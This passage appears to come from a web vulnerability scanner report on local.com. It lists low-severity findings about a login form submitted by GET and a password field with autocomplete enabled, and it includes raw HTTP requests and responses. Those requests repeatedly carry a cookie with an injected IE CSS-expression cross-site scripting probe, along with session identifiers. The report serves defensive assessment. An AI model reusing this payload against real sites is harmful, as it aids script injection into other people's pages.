Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.25. http://www.local.com/sitemap.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.26. http://www.local.com/sitemap/chicago-il.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.27. http://www.local.com/sitemap/los-angeles-ca.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.28. http://www.local.com/sitemap/new-york-ny.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.29. http://www.local.com/terms/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.30. http://www.local.com/topics/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 38 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.local.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.2. http://www.local.com/business/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; 